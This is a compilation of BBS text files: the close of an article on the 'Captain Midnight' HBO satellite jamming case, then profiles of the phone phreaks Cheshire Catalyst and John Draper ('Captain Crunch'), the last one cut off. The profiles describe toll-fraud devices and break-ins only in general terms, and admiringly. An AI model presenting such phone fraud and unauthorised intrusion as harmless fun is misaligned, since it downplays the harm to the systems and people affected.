worry.  "I was very concerned about it, but I didn't let on," he says.  "I'm
able to hide my feelings very well.  I can just about convince people I'm a
total raving maniac at the same time."

  Two weeks later, the FCC returned.  This time, they brought along U.S.
Attorney Lawrence Gentile III, who served MacDougall with a subpoena to appear
in U.S.  District Court in Jacksonville.  According to MacDougall, their
conversation went like this:

  "What's this for?" MacDougall asked when Gentile held out the subpoena.

  "Captain Midnight," answered Gentile.  "Aren't you aware that you're a
suspect in this incident?"

  "You're trying to tell me that just because I'm a satellite dish dealer and I
happened to work for a teleport, I'm a suspect?  responded MacDougall.

  "There are other things," replied Gentile.

  "Well, what are they?" asked MacDougall.

  "We can't discuss it here," said Gentile.  "We can talk about it in front of
the grand jury.  You need to think very carefully about this.  You seem like a
level-headed man, but you don't seem to be taking this seriously.  This is a
serious time.  You might want to consult with an attorney."

  "Attorney for what?" questioned MacDougall.  "I haven't done anything.  An
innocent man does not need an attorney.  The only people who hire attorneys are
guilty people."

  According to MacDougall, Gentile then attempted to reach an agreement with
him.  "If you would be willing to talk to us about this and tell us what you
know about this incident right now," said Gentile, "I'd be willing to recommend
probation to the judge and a small fine.  Probation and a fine are not bad
considering what you're facing.  Let's face it, Mr.  MacDougall, this is not
the crime of the century.  However, we have been getting a lot of pressure on
this."

  MacDougall said at that point he began to think there was not enough evidence
to convict him; otherwise he wouldn't have been offered a plea bargain.  Still
claiming innocence, MacDougall told Gentile he would see him in Jacksonville.

  MacDougall's first brief jamming raid on HBO led investigators to strongly
suspect him.  The investigation had been narrowed down to uplink stations with
the capacity to pull off both raids, and then to those manned by the same
person at the time of each incident.  "We had a very good idea he was our man,"
says Gentile.  "Of all the people I talked with, he was the only one I gave
target warnings to [the equivalent of the Miranda warnings police give when
they make an arrest].  "He says he leaned on MacDougall "pretty hard."

  MEET CAPTAIN MIDNIGHT

  Taking Gentile's advice, MacDougall contacted an Ocala attorney, John Green
Jr.  When they first met, MacDougall recalls, "he said, 'Well, John, tell me
about Captain Midnight.' And I reached out my hand and said, 'Well, here,
that's me.'"

  Green advised him that he had a 70-percent chance of winning the case.  If
convicted, he faced a $100,000 fine and/or one year in jail.  But MacDougall
decided to enter a plea of guilty.  "There were two reasons," he said.  "I
could release my guilt, plead guilty, and get it over with, do the right thing.
That kept panging at me:  do the right thing.  But the other side, the
activist, kept saying, 'Stand up for your rights.' My idealism and my activism
were combating my conservative upbringing and my conservative political
leanings.  They were battling back and forth, and I was at my wits' end.  I
didn't know what to do."

  MacDougall also worried about going before the grand jury and trying to lie
his way out of the charge.  "I would not have wanted to take a midemeanor and
make it a felony by committing perjury," he says.  In the end, the determining
factor was money.  Green advised his client that going to trial could take 6 to
12 months and cost $30,000 to $40,000.  "During that time," MacDougall says, "I
couldn't have said anything, and I would have been bombarded by the press.  It
would have been a nightmare."

  Fighting and then losing the case was always a possibility, and MacDougall
conjured up nightmares of what that might entail.  "This was a federal
penitentiary they could have sent me to," he said.  "The concept just didn't
register, to be sitting eating lunch with the other convicts in striped
uniforms, and a guy says, 'Hey, what are you in for?" And I say, 'Oh, I
operated a trnsmitter without a license.' I couldn't take the risk."

                      FUN EDUCATION

  By the time he went to the federal court on July 22 and went through the
arrest procedure, which included being photographed and fingerprinted,
MacDougall's curiosity was back in full force.  "If I hadn't been directly
involved, it probably would have been a fun educational experience," he says.
"You can't just plead guilty to a crime.  It's hours and hours of discussion,
and you have to prove to the prosecutor, and also the judge, that you are
guilty.  Then, you have to prove you weren't coerced into making the statement,
and that you have knowledge of your rights." MacDougall says officials at both
the July 22 hearing and the sentencing, on August 26, were surprisingly
cordial.  He speaks of smiles, handshakes from marshals, and understanding from
U.S.  Magistrate Howard T.  Snyder, who fined him $5,000 and placed him on one
year's probation.  "I'm glad to see that the legal system does work," he says.

  Meanwhile, although convicted in court, MacDougall had become a hero to many
dish owners and satellite TV dealers.  A group calling itself the Captain
Midnight Grassroots Coalition had formed and was selling bumper stickers,
T-shirts, visors, and sweat bands to raise money for MacDougall's legal costs.
Said Donald Cochran, spokesman for the coalition:  "While there are those who
consider Captain Midnight a criminal for his unauthorized transmissions, there
is another group made up of home satellite dish owners, small business people,
and rebels, who support his actions as a non-violent and non-destructive
protest in the best American tradition."

                     THE RIGHT REASONS

  MacDougall says he has had no direct involvement with the coalition, but he
adds, "I would like to see my own industry support me in this.  Even though I
may have done more harm than good, as some people think, I did it for the right
reasons."

  Central Florida Teleport owner Eagan, on the other hand, says that local
opinion in Ocala and surrounding Marion County has gotten "silly." When the
coalition presented MacDougall with its first donation, a check for $500, in
September, a crowd gathered outside his office, and drivers of passing cars and
pickup trucks honked their horns.  Says Eagan, "There's a group of people here
who think that John MacDougall is a wonderful man and a great hero who has done
wonderful things for them.  But to me, that has not been placed in the
perspective of the world view or even the regional view.  Ninety-nine and nine
tenths [percent] of the people don't agree."

  Eagan says the only positive thing to come out of the incident was that
MacDougall was in the home dish business and so there was at least a reason for
him to have done it.  "If it had been some crackpot who did it just for the
hell of it, or an employee being vindictive, then the corporate community would
have been more upset.  This way they can say, 'We're not the target, HBO was.'"

  Still, the FCC is stepping up security.  It has moved to require that by the
end of 1987 every radio and television transmitter must use an electronic name
tag whenever it is on the air.  Each satellite uplink station would leave a
unique, unchangeable electronic signature whenever it was used.  Also, a bill
is being drafted in Congress that would raise the penalty for satellite
interference to a $250,000 fine and/or 10 years in jail.

                    SCRAMBLING A REALITY

  HBO's Levy says that now that scrambling is a reality, he believes consumers
are dropping their emotional resistance to it.  "We were the first ones to
scramble," he says.  "We got the arrows in the back and we were the ones to get
jammed.  We're over the first hurdle.  HBO wants its products in every home in
America.  We are attempting to increase our business through home dish owners.
We're calling for the marketplace to set the price.  It wouldn't make sense for
HBO to stifle its growth.

  MacDougall says he never contested the right of HBO and other programmers to
make a profit from their programs, nor did he object to their right to protect
those profits by scrambling signals.  "My real concern is that the free and
competitive marketplace be allowed to operate for the benefit of the American
people," he says.  Now, he believes that the last line of Captain Midnight's
message [Showtime/Movie Channel Beware!] was misunderstood and got him into a
lot of trouble.  "It was a bad choice of words on my part," he says.  "I was
just trying to tell them:  "Look before you leap.  Don't follow HBO as the
leader.'"

  It was, he says, the act of a frustrated individual who was trying to get his
point across to people who didn't seem to listen.  He hopes no one will try to
imitate what he did:  "The message is now out; there's no reason to do it
again."

  MacDougall was born in Elmhurst, Illinois, just outside Chicago.  His mother,
Thelma is a homemaker, and his father, Robert, was a successful building
contractor, who retired when MacDougall was 9.  The youngest of three brothers
and one sister, MacDougall moved to Florida with his family shortly after his
father's retirement at the age of 47.  MacDougall speaks often of his father.
Although his entire family supported him after the HBO incident, he says, "My
father is of the old school, a very staunch conservative:  the law is the law,
and it should never be broken."

                     WAS IT WORTH IT?

  MacDougall says he doesn't know now if playing Captain Midnight was worth it
all:  "I might be able to better answer that in a couple of months." He intends
to write a book about the incident and plans to continue holding on with his
satellite TV business in Ocala.  He says that like many small businessmen, he
didn't start off with enough money, although he did turn a profit in his first
year.  "I'm losing money now and a good businessman doesn't lose money," he
admits.  "I didn't buy expensive food.  I bought cheap gas for my car.  I cut
everything I could and I'm still losing.  Now, I can barely plan a month ahead
because of the volatile changes in the business.  You never know what's going
to happen the next day."

  MacDougall believes in himself, although he says he's not a great salesman.
He lost his job at the Central Florida Teleport before he was revealed as
Captain Midnight, because People's Choice went off the air.  But all the
publicity has resulted in more repair business from dish owners, and he says
manufacturers return his calls quicker now.  "There's a certain pride that goes
into my systems," he says.  "I sell a part of myself with each system."

  For all his public declarations of regret, there is also an undeniable pride
in having pulled off the notorious HBO raid.  "Did I know it would work?" asks
Captain Midnight.

                      "DEFINITELY!"


X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X

 Another file downloaded from:                               NIRVANAnet(tm)

 & the Temple of the Screaming Electron   Jeff Hunter          510-935-5845
 Rat Head                                 Ratsnatcher          510-524-3649
 Burn This Flag                           Zardoz               408-363-9766
 realitycheck                             Poindexter Fortran   415-567-7043
 Lies Unlimited                           Mick Freen           415-583-4102

   Specializing in conversations, obscure information, high explosives,
       arcane knowledge, political extremism, diversive sexuality,
       insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.

  Full access for first-time callers.  We don't want to know who you are,
   where you live, or what your phone number is. We are not Big Brother.

                          "Raw Data for Raw Nerves"

X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
File: WHO IS CHESHIRE CATALYST?
 Read 20 times

=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=
-									      -
=				 The Intruder				      =
-									      -
= [A biography of Cheshire Catalyst -- Technology Illustrated (Oct/Nov 1982)] =
-			     by Douglas Colligan			      -
=									      =
-		      Awesome Photography by John Goodman		      -
=		      (too bad we couldn't reproduce it!)                     =
-		      [Word Processed by BIOC Agent 003]		      -
=									      =
--=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=--

-------------------------------------------------------------------------------
 Whether it's the phone system or a computer network, there's always a way to
			       slip in for free.
-------------------------------------------------------------------------------

   Cheshire first started going astray after an incident during his senior year
at an upstate New York high school in the late sixties.  The school has a small
IBM computer, one that he heard could make pictures of his hero, Snoopy.  He
asked to use it and was told no, it was only for the advanced math students.

   "And that," he says, "was the first IBM 'big lie' I ever saw through."  The
suggestion that computers were only for eggheads was more than enough to whet
his curiosity.	So he got friendly with the teacher in charge of the computer
and eventually became fluent in several computer languages.  Today he works for
a large Manhattan firm where he teaches his fellow employees how to use word
processors and perform other computer-related chores.

   In his off hours, Cheshire (short for Cheshire Catalyst) uses computers in a
slightly different way.  Once he takes off what he calls his real-world
disguise (his tie), he settles down in front of his Apple II keyboard and
starts "phreaking" -- ambling through the circuits of his archenemy, the phone
company, exploring its electronic geography, and slipping in and out of
computer networks.  As the name suggests, computer networks are computer-to-
computer communications systems that run over the same lines people use to make
phone calls.   With a simple attachment for the phone receiver and the right
code numbers, a computer user can hook into a network.	If people clever
enough and persistent enough want to get into a network, they can just keep
sending different number combinations over the phone to the network until they
hit the right code, or password.  Today just about everyone, from national
banks, to the Defense Department, uses computer networks to transact business.

   Cheshire, of course, is not his real name.  It's not even his real
pseudonym.  The reason for the secrecy is that Cheshire is a member of the
underground movement, a nationwide assortment of people devoted to satisfying
their sense of adventure with the best that Apple and IBM and the phone system
have to offer.	Not everything they do is, strictly speaking, legal.

   The history of this movement goes back to the days of the phone phreaks, as
they called themselves, whose hobby was to make as many phone calls for as
little money as possible.  Their secret weapon was the blue box, which got its
name from the fact that the first one discovered by the phone company happened
to be packaged in a blue-painted box.  A blue box is an ingenious package of
electronics that lets users trick the phone company's tone-activated long-
distance system into letting them make a long-distance call for the price of
a local one.  For the 20 years or so that the blue boxes have been around,
there has been a continuing cat-and-mouse game between the phone phreaks and
the Bell System.  For every new method the Bell System has devised to detect
the boxes, the phreaks have come up with a better box.

   Cheshire's initiation into the phone phreaking came when he decided to see
if he could somehow get onto the Telex system (a network of specially equipped
keyboard machines used for sending messages over telephone lines).  His one
problem was that the area where he lived was served by an independent phone
company that didn't have the kind of equipment it took to handle Telex
messages.  So Cheshire figured out how to get his home computer to do the work
of that equipment.  Before long he was sending phantom messages to Telex
machines all over the world.  Messages like:  "Good grief!  I seem to have
reached Adelaide, Australia.  This is just a computer hacker in the United
States out for a good time."

   Cheshire shares his virtuosity with other phone phreaks and computer hackers
(a hacker is a person who has an almost addictive fascination for playing
around with computers) six times a year in a modest little publicaton called
the TAP newsletter.  It's the only tangible manifestation of a secretive group
calling itself the Technology Assistance Program.  The newsletter is to phone
phreaks what The Wall Street Journal is to stockbrokers.  Each four-page issue
is an odd amalgam of articles:	how to make and use lock picks; how to log onto
computer networks like Telenet without paying; how to turn number-14 brass
washers into phone slugs; and, during the hostage crisis in Iran, what the
phone number of the American Embassy in Tehran was, so that anyone who felt
like telling the captors off could give them a ring.

   The newsletter illustrates how sophisticated the craft of being any kind of
phreak has become.  There are not only blue boxes, but red boxes, purple boxes,
black boxes, beige boxes, white boxes, brown boxes, yellow boxes, green boxes,
a colorless mutes.  Some, like purple boxes, are combination units, in this
case a blue box, which tricks the phone company's equipment into letting the
user make a long-distance call for free, and a red box, which does an excellent
imitation of the sound of a coin being deposited in a pay phone.  A black box
makes the phone company think the call was not answered even as the
conversation is going on.  And so on.

   The by-lines under the newsletter's articles are as colorful as the boxes:
The Professor, The Wizard, Dr. Atomic, Alexander Mundy (the lead character in
the old "It Takes a Thief" television series), and Jim Phelps (of "Mission
Impossible" fame:  "Good morning, Mr. Phelps..."), to name a few.  Cheshire
himself acts as an unofficial press liaison for TAP, if only because he's one
of the few members who will consent to be interviewed about it.

   Each Friday after work, a small band of TAP people gathers together to
exchange gossip, discuss new developments in the world of computers and phone
phreaking, or hash over the contents of their next newsletter.	Meetings are
usually attended by Tom Edison, the newsletter's editor, Cheshire, and several
others.  Like Cheshire, all have technical backgrounds.  VAX-man is a computer
programmer; The Librarian, a systems analyst; another regular, who wouldn't
even give a pseudonym, has a middle-management job with a defense contracter.
All TAP members are adamant about the public's right to know the kind of
technical information their newlsletter publishes.  "We're just an information
service for people," says The Librarian.

   "And a lot of the information is public knowledge," adds Cheshire.  "We're
just sharing the forbidden knowledge that the Bell System doesn't want you to
know."

   Like what?  Well, like the toll-free 800 numbers, for example.  Some phone
phreaks have figured out how to use the 800 numbers to get transferred onto
other, unpublicized toll-free lines to make free calls all over the country.

   The idea that phone phreaks belong to the people is one with a venerable
past.  Measured against other underground publications, TAP is positively
geriatric.  It was started in 1971, on May Day, in fact, by Mr. Couterculture
himself, Abbier Hoffman, and a phone phreak who called himself Al Bell.  Since
it was an outgrowth of the Youth International Party, or Yippies, it was
originally called YIPL, for Youth Internationl Pary Line.  A few years later
there was a political schism in the ranks between the phone phreaks and the
Yippies.  The former, who were more interested in blue boxing Ma Bell than in
pushing politics, took charge of the periodical and relaunched it under the
name of TAP.  Cheshire happened onto TAP in the late 1970's.  His contributions
to the newsletter, he says, have been in tune with what he calls "the light
side of the hack."

   "It's true that by just hacking around you can probably find the loophole
that can get you in a computer or network.  You have to have luck, time, and
knowledge.  Still, there's one thing you're certain of:  You can break in.
It's only a computer."

   Light-side hackers will find a loophole in the computer or computer
network's security and, as Cheshire puts it, "play around inside."  He does it
with his goofy Telex messages or in some instances by tracking down government
snoops and doing his best to embarrass them.  He once noted that a mysterious
computer in Quantico, Virginia, would occasionally tap into a local informal
comptuer network called B-Boards, short for bulletin boards.  The person would
read the computer mail but whould never send or receive any messages.  Noting
that the FBI has a computer-crime training school in Quantico, Cheshire sent
the eavesdropper a message detailing the TAP newsletter's semisubversive
offerings a suggesting that he or she subscribe.

   During a lunch break once, a friend of Cheshire's wandered into a computer
network called ARPANET, started up by the Defense Department back in 1969.
After a little noodling around, Cheshire's friend found himself reading
displays from a computer at a Norwegian seismic station that monitors Soviet
nuclear testing.  Being anti-phone company doesn't mean being anti-American,
and Cheshire and his friends were disturbed by the ease with which the top-
secret computer could be tapped into.  As a result, they decided to set up a
special phone-phreak conference two years ago.	They sold tickets in advance
($5 a person) by running ads in their newlsletter, rented a conference room at
the Gramercy Inn in Washington, D.C., and attracted an audience of about 100.
Among other things, Cheshire told those who attended about his friend's romp
through the Norwegian computer.  Did anyone in the government pay attention?
"Well, we did notice a couple of guys out there in the audience wearing sports
coats who turned a shade of light green when they heard," he says.

   Dark-side hackers, by contrast, often tap into other people's computers to
alter or destory (crash) their programs.  Some West Coast hackers manages to
break into the computers of the phone company and selectively reclassify
service on their phones, giving themselves free service options like call
forwarding.  Some dark-siders go a step further.  Exploiting the inevitable
program loopholes, skilled hackers have been known to coax complete lists of
users' passwords out of computer time-sharing systems.  They can even command
the computer to keep them abreast of future password changes.  Such lists, when
the users include banks and large businesses, can be sold for thousands of
dollars on the black market.

   When it comes to anything that has a whiff of dark-siding, Cheshire is a
spectator.  He doesn't blue box, and he scrupulously pays his phone bill on
time to keep the heat off TAP.	Although, in private he is a kind of high-tech
merry prankster, in public he walks the straight and narrow.  Even so, there
are those who know about his activities.  "Officially," he says, over lunch
at a midtown restaurant near his office, "my boss doesn't know what I do in my
spare time."  Unofficially, his employer does know.  "That's why I was hired,"
he says.  "I knew the Telex network inside out because I came in the back
door."  It was a skill his company knew would come in handy when there wasn't
time for the more traditional ways of getting onto the Telex network.

   Basically, Cheshire is more Kilroy than Jesse James.  What has him hooked is
the amusement of it all.  "I'm just playing around," he says.  Computer crime?
"I'm not out to steal megabucks.  I know I could if I wanted to," he adds, "but
knowing I could is good enough for me."

   "Even the phone company doesn't arouse all that much hospitility from him.
In fact, the one act of censorship done by TAP was carried out with the phone
company's welfare in mind.  Someone has sent TAP plans for a hydrogen bomb.
For the first time, TAP decided a story was too hot to touch.  Why?  "Among
other things, anyone using that technology is going to take out the phone
network.  And that's not what we're into,"  he says.

   "There's a real love-hate relationship between us and the phone company.  We
don't particularly appreciate the bureaucracy that runs it, but we love the
network itself," he says, "lingering the word love.  "The network is the
greatest thing to come along in the world."

   "Our lunch ends, and Cheshire flags the waiter to ask where the pay phone
is.  I watch him as he makes a call.  He puts in a dime, just like eveyone
else. <>

[Courtesy of Sherwood Forest ][ -- (914) 359-1517]



                          Raping Ma Bell
                          CAPTAIN CRUNCH

                  Profile by : Zbigniew Kindela
            This copied from Hustler Magazine Feb '79


It's one o'clock in the morning, and I'm standing in the TWA 
arrival-departure hub of Los Angeles International Airport.  I'm 
waiting to meet John Draper (known as Captain Crunch to his 
select group of peers), and I'm wearing a red HUSTLER T-shirt so 
he can spot me easily.  I don't know what to expect.  Off and on 
for several years I have followed Crunch's career as the nation's 
foremost rapist of Ma Bell - the telephone company - and I have 
this superhero image of him, an image cultivated by the media 
coverage he has received.

     The 35-year-old Crunch is the creator of the "blue box," a 
device that allows its user to gain access to nearly all the 
telephone company's transmission equipment - simple lines, 
microwaves and even the communications satellites - as long as 
the user knows the proper codes.  Crunch claims that given enough 
time, three such good blue boxes could tie up America's entire 
phone network in such a way that no calls can be placed.  No one 
knows for sure if this is possible, but even so, cities - such as 
Santa Barbara, California - have been tied up for as much as an 
hour.

     But then Captain Crunch usually knows what he is talking 
about.  He knows more about the intricacies, idiosyncracies and 
secrets of the world's telephone system -information that he has 
picked up without direct help from Ma Bell- than practically 
anyone else alive.  Crunch is also one of the first Americans to 
have gone to prison because of what he knows.  And he owes it, in 
part, to Cap'n Crunch, the breakfast cereal from Quaker Oats.

     During the late '60s each box of Cap'n Crunch cereal 
contained a plastic toy whistle as an inducement to purchase the 
product.  The note, or tone, produced by the whistle when it was 
properly blown into a phone receiver could get a toll-free call.  
When Denny, a blind "phone phreak" (the name adopted by those who 
secretly and illegally play with the telephone company's 
equipment) discovered the whistle's capability, he turned on his 
other blind friends.  Then, in 1970, Denny gave John Draper the 
secret of the Cap'n Crunch whistle, christened him Captain Crunch 
and, in effect, gave birth to the first sighted phone phreak.  In 
short order, Crunch was transformed into a wizard of telephony. 

     Until he was 12 years old, Captain Crunch lived amid the 
chicken farms of Petaluma, California.  Long before he turned 
into a full-time phone phreak employing blue boxes and computers 
in search of "information" (or telephone-company codes allowing 
him access to specialized communication networks), Crunch showed 
a decided interest in science and math.  While in England, where 
he spent several years with his Air Force family, he conducted 
his first experiments : At one point he converted a bicycle 
generator into one capable of producing 10,000 volts.

     By the time he was ready to enter high school, the family 
had returned to the States.  He enrolled in a high school in 
Vacaville, California, where - during the first month - he got 
into nearly 100 fights.  He was harassed by the school thugs 
until he began lifting weights and developing his small frame.  
His senior year was spent at yet another high school - in San 
Jose this time - and it was here that his brilliance began to 
show.  Crunch built a small radio transmitter, which he operated 
until a Federal Communications Commission agent shut it down.  

     Undaunted, Crunch continued his pirate-radio venture several 
years later while in the Air Force.  Stationed as a radar 
technician in Alaska, Crunch built a 200-watt transmitter with a 
range of 450 miles.  This time, however, he wasn't busted.  "I 
got a call from the FCC monitoring station, saying they enjoyed 
my show and asking me not to use profanities," he says.  "Up 
there nobody cares."

     In 1970 he left the Air Force and got a job with a company 
that built radar systems.  That same year he also picked up the 
Captain Crunch moniker and was on his way to becoming PHone 
Phreak Number One.

     The cereal-box whistles were mere toys with limited 
capability, since they could produce only one tone, while the 
phone company's network relied on many tones and combinations 
thereof.  One of the blind phone phreaks realized he could 
produce several tones on his small home organ by pushing the 
appropriate keys.  All he had to do was play a particular 
sequence into the mouthpiece of the telephone, and he could call 
anywhere in the world without charge as long as he used the 
proper sequence.  Phreaks would sit at their phones dialing 
random numbers in sequence, listening to the various tones.  When 
an unusual tone was reached, it was logged, and later, through a 
process of elimination, several codes were finally cracked.

     Shortly, various phreaks were making tape recordings to play 
into phones or were giving the recordings to other phreaks, until 
it was routine procedure to call a pay phone at Waterloo Station 
in London, or to call South Africa for the correct time there.  
But the process had a long way to go.  Based on information 
obtained from a phreak, Captain Crunch began designing a device 
that could duplicate all of the necessary tones.  In due time he 
had built the first blue box.  Its face contained tone buttons 
similar to those of a touchtone telephone.  When this first blue 
box became a reality, the era of whistles, tapes and organs was 
over.

     At one point organized crime found out about the blue boxes 
and asked one phreak to build a thousand devices for $300,000.  
The Vegas Syndicate was going to use the boxes for placing bets 
undetected (and free of charge).  It is this type of phone phreak 
that Crunch considers "the lowest scum in the phone-phreak 
community," largely because they don't follow the ethical 
standards set up by the "Top Ten Phreaks," as the best minds in 
the community are called.  These top ten seek only to acquire 
information, or more access codes, which they then share with one 
another.  It was through such information that Crunch was able to 
call around the world clockwise and counterclockwise several 
times on one occasion, while on another he used two adjacent 
phones to call himself through Japan, India, Greece, South 
Africa, Brazil and New York City from San Francisco.  It took his 
voice 20 seconds to complete the trip.

     Then, in 1972, Crunch was turned into the FBI by two phone 
phreaks - "snitches" as he calls them.  Charged with fraud by 
wire, he was fined $1,000 and put on five years' probation.  
After having spent thousands of patient hours trying different 
combinations of phone numbers in order to find access codes, 
Crunch's telephone bill under the violation amounted to $30.

                            *   *   *

     And this is the hero of the underground telephone network I 
am to meet.  His plane finally arrives, and amid a chorus of 
sheep bleatings from passengers and greeters alike, I spot what 
appears to be a human - though I am struck by the image of an 
anteater - gawking about.  He is wearing a wrinkled Ban-Lon 
shirt, festering with fuzz balls.  His wide-pin-striped pants - 
also wrinkled - ride at least three inches above the tops of his 
scuffed ankle boots, while his socks (lacking any vestige of 
elastic) are rolled down, revealing vampire-white skin and sparse 
patches of black hair.  I know it's Captain Crunch.

     I suddenly realize that I don't want to meet him.  Should I 
grab the first female to walk by as if I'm there waiting for her?  
But it's too late.  He spots my HUSTLER T-shirt, and his hand - 
with index finger extended - shoots upward.  He lopes over, as 
the other hand holds a portable radio to his ear.

     "I picked up a great pirate station up there.  Clear as a 
bell for hundreds of miles," says the creature who has just 
shattered all of my expectations.

     "You John Draper?" I ask, hoping against the inevitable.

     "Yeah.  The station played some good music.  The jockey must 
have a powerful transmitter.  Sure'd like to see it...."

     "This way, John," I interrupt.  Taking his pallid arm, I 
lead him to the baggage-claim area.  I had envisioned a Justice 
League of America hero, and I am confronted with a babbling
lunatic.

     I quickly grab his bag, walk to my car and begin driving to 
his lodging for the night.  It disturbs me that I can't wait to 
drop him off, that I don't want to talk to him, that I don't 
want to be seen with him, even driving late at night.

     Abruptly, he takes off on a new jag.  "Before I leave, I'll 
show you some great relaxing exercises."

     I play coy.  He hasn't actually asked a question, I reason.  
Keep quiet, I tell myself, maybe he'll shift subjects again.

     As he winds up for the second inane attempt, I cut him off.  
"Look, John, I'm not a physical-fitness weirdo.  I drink a lot of 
beer, and I do my exercising either under or over a woman.  No 
personal offense, OK?"

     His sudden silence, ironically enough, makes me feel guilty - 
or at least ambivalent toward him.  I turn on the radio, saying, 
"You don't mind, do you?"  He doesn't say a word.

     Even though the trip to his hotel only takes 30 minutes, it 
seems as if several hours of this nonverbal penance have elapsed 
before we finally arrive.  In the hotel lobby a premonition - 
though indecipherable - overtakes me.  I reason that it's the 
night clerk, whose eyes are popping froglike out of his head. 

     Between Crunch and Froggy I am spooked.  And adding to that, 
the clerk can't find a reservation for the electronic wizard.

     As Crunch and I drive off, I as him, "This happen to you 
often?"

     "All the time" is his only response.

     I entertain a paranoid fantasy that every hotel and motel in 
Los Angeles is onto Crunch's bag of telephonic tricks and, as a 
consequence, he'll have to spend the night at my place.

     "I'll drive all night if I have to," I say through clenched 
teeth.  "I've got $20.  That should be enough."

     I finally find a place on Santa Monica that seems open for 
business and looks as though a room will cost under $19.  I pound 
on the door for several minutes until a blear-eyed Arab opens it.  
I ask for a single.  The manager looks at me bewildered, sticky 
sleep glued to the corners of his eyes.  "The money?  You got 
it?" he asks suspiciously.

     "How much?"
     
     "$18.76," he replies in perfect English, as I'd expected.

     "Does it have a phone?" Crunch chimes in.

     "No, sir.  Pay phone there," says the Arab, pointing to a 
booth.

     "He'll take it," I yell out, and turning to Crunch I hiss, 
"Just shut up!  Who do you have to call at this hour?!  I'll pick 
you up at 11 tomorrow."

                            *   *   *

     Captain Crunch is an addict.  Instead of being strung out on 
dope, however, he is hooked on the crackle and beep of telephone 
lines.  Small wonder that his 1972 conviction didn't straighten 
him out.  Rather, he kept phreaking, although he says that he has 
avoided using the blue box.  In 1975 Crunch found the code giving 
him access to the phone company's auto-verify circuit, which
allows a phone to be tapped.  Somehow the code was released to 
the phone phreaks - Crunch claims it was done by an unethical, 
low-level phreak - and shortly it became a game among the many 
phreaks to listen in on the San Francisco FBI office, the Federal 
Communications Commission, various police calls and even the CIA.

     During this same period Crunch managed to obtain a copy of 
the operating manual for the National Crime Information Center 
computer.  The manual had "everything I need to know to get into 
NCIC," Crunch says, although he vows he has never tapped into it.  
Regardless, the FBI was interested, since the computer contains 
all of the information every gather about anyone - criminals and 
noncriminals - by the FBI, and Crunch had a computer terminal 
hooked into a master computer.  The terminal in his possession, 
he says, was for legitimate use - he was working for an 
independent firm as a "computer programmer/systems analyst."

     As with his first bust, Crunch claims to have been set up by 
a phone-phreak-turned-informer-and-provocateur for the FBI, which 
allegedly gave the informer a blue box with which to entrap 
Crunch.  Captain Crunch claims that the entrapment worked, and in 
1976 he was indicted a second time.  Since he was still on 
probation, he made a deal with the FBI to supply them with all 
the information he had.  The FBI rented a hotel suite and 
interviewed him for four to six hours a day for five days.  
Crunch is proud that he went the distance without snitching on a 
single phreak.

     Due to his cooperation, the judge sentenced Crunch to four 
months instead of the five years he could have gotten.

     Crunch did his time at the Federal Correctional Institution 
in Lompoc, California, a minimum-security facility where Nixon's 
former chief of staff, H. R. Haldenman, currently resides.  While 
incarcerated, Crunch was periodically tormented by the inmates, 
who would blow smoke in his face while threatening to give him a 
"blanket party" if he didn't teach them how to make free 
telephone calls.  Being allergic to cigarette smoke, Crunch 
naturally obliged them.

                            *   *   *

     "I can't take it," says Crunch's voice over the telephone 
the following morning at 9:30.  "There's no phone in here.  I'm 
checking out.  If I don't, I'll go crazy."

     His last sentence makes me feel as pleased, I imagine, as a 
sadist with his pleading slave.

     In 25 minutes Crunch arrives at the office, and no sooner 
does he arrive than I drag him off to another motel - the 
Tropicana, rumored to be the scene of Janis Joplin's last big 
night.  I register him again - gets his own phone, although I 
don't clue him in that he's got to go through the motel 
switchboard - and tell him that I'll pick him up after lunch.

     When I return, Crunch is not in his room.  I find him lying 
spread-eagled beside the pool.  His shirt is off, and the bright 
sun only makes his skin look ghostlier.  Even the three or four 
homosexuals around the pool seem to be making a concerted effort 
to avoid looking in his direction.

                            *   *   *

     After Crunch settles in at our offices, the first thing he 
asks for is a telephone, a request that creates some warranted 
nervousness among those present.  He is promptly dissuaded (the 
time is running late), the tape recorder is flipped on, and he 
begins his revelations, which may not bode particularly well for 
America :

     *The telephone company has 722 security agents with certain 
wiretapping privileges, and perhaps as many as 90,000 employees 
involved in monitoring calls.  No court orders are necessary for 
"mechanical or service quality-control checks" or "the 
protection of rights or property" - a vague clause used as an 
excuse for blanket monitoring on the grounds that the phone 
company alleges you are ripping them off.

     *Roughly 70 percent [Editor's Note: An AT&T spokesman claims 
only 12 percent] of the phone company's security force has at one 
time worked for a law-enforcement agency, including the FBI, 
leading one to speculate about the possible ties these agents 
still maintain with their previous employers.

     *Between 1964 and 1970, 1.8 million phone calls were 
recorded (out of the 30 million calls electronically monitored 
during the first minute of the call) to determine if any of them 
were of blue box origin. 

     *For years now the National Security Agency has been 
monitoring microwave communications in the country.  Computers 
have been programmed to listen for key words, such as cocaine, 
dope, conspiracy.  When a coded word is registered during a 
monitored conversation, the computer will start taping the call.

     *When all of the new telephone systems are implemented, the 
police will get instant identification of your phone number when 
you call them - or when you call the White House or a prominent 
figure.

     *But the most frightening invention to come along, claims 
Crunch is REMOB (or remote observation).  Anyone with the proper 
code will be able to monitor calls from anywhere in the country, 
while also holding the power to censor the call.  Furthermore, no 
existing form of telephone communication - trunk line, microwave 
or satellite - can escape the remote-observation system.

     "REMOB will create 1984," Crunch says.  "The phone company 
will provide the government with the proper access codes."  Most 
Americans will say that since they're not criminals, they have 
nothing to hide, which is true.  However, they stand to lose their 
right to privacy and their right to talk to friends and relatives 
- often about private matters no other person has a right to 
hear.  THe question is, do Americans want their private sex lives 
or business dealings known by various federal agencies?

     Fearing such a potential for abuse with REMOB, Crunch 
recently called a press conference in New York in order to warn 
the public.  In short order the phone company received its equal 
time and denied the existence of such a tapping/censoring device.  
"But with everything I know about the phone network, and all of 
the verifications I've done on this REMOB, I feel that it does 
exist," states Crunch.

                            *   *   *

     While completing this profile, I received a telephone call, 
and subsequent letter, from Crunch.  This telephone addict - who 
